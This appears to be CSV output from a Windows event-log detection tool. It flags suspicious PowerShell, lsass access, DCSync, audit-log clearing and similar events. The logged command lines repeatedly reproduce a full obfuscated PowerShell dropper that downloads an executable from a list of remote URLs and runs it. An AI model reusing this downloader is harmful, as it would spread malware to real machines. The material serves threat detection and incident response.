neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object" +ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 792 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=33 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item" +ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 786 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=21 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item" +ParameterBinding(New-Item): name="ItemType"; value="DIrectOry" +ParameterBinding(New-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656," + + + + + 4656 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314461 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + 00000000-0000-0000-0000-000000000000 + %%1537 + %%1538 + %%1539 + %%1540 + %%1541 + %%4480 + %%4481 + %%4482 + %%4483 + %%4484 + %%4485 + %%4486 + %%4487 + %%4488 + %%4489 + %%4490 + %%4491 + %%4492 + %%4493 + + - + 0x1f3fff + - + 0 + 0x1688 + C:\Windows\System32\cscript.exe + - + +",MSEDGEWIN10,Security +Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 4987 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + + +",IEWIN7,Security +Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 768617 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202793 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202792 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 769792 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x4c331 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662," + + + + + 4662 + 0 + 0 + 14080 + 0 + 0x8020000000000000 + + + 202791 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-21-738609754-2819869699-4189121830-500 + Administrator + insecurebank + 0x40c6511 + DS + %{19195a5b-6da0-11d0-afd3-00c04fd930c9} + %{c6faf700-bfe4-452a-a766-424f84c29583} + Object Access + 0x0 + %%7688 + + 0x100 + %%7688 + {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} + {19195a5b-6da0-11d0-afd3-00c04fd930c9} + + - + + +",DC1.insecurebank.local,Security +Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 887106 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x3a17a + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ ) with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +",MSEDGEWIN10,Security +schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702," + + + + + 4702 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 198239223 + + + + + Security + DC1.insecurebank.local + + + + + S-1-5-20 + DC1$ + insecurebank + 0x3e4 + \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <RegistrationInfo> + <Source>$(@%systemroot%\system32\sppc.dll,-200)</Source> + <Author>$(@%systemroot%\system32\sppc.dll,-200)</Author> + <Version>1.0</Version> + <Description>$(@%systemroot%\system32\sppc.dll,-201)</Description> + <URI>\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</URI> + <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)</SecurityDescriptor> + </RegistrationInfo> + <Triggers> + <CalendarTrigger> + <StartBoundary>2019-03-26T12:51:45Z</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="NetworkService"> + <UserId>S-1-5-20</UserId> + <RunLevel>LeastPrivilege</RunLevel> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>false</AllowHardTerminate> + <StartWhenAvailable>true</StartWhenAvailable> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession> + <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>PT0S</ExecutionTimeLimit> + <Priority>7</Priority> + <RestartOnFailure> + <Interval>PT1M</Interval> + <Count>3</Count> + </RestartOnFailure> + </Settings> + <Actions Context="NetworkService"> + <ComHandler> + <ClassId>{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}</ClassId> + <Data><![CDATA[timer]]></Data> + </ComHandler> + </Actions> +</Task> + +",DC1.insecurebank.local,Security +Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2988521 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1105 + jbrown + 3B + 0x1717b6 + + +",01566s-win16-ir.threebeesco.com,Security +User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name 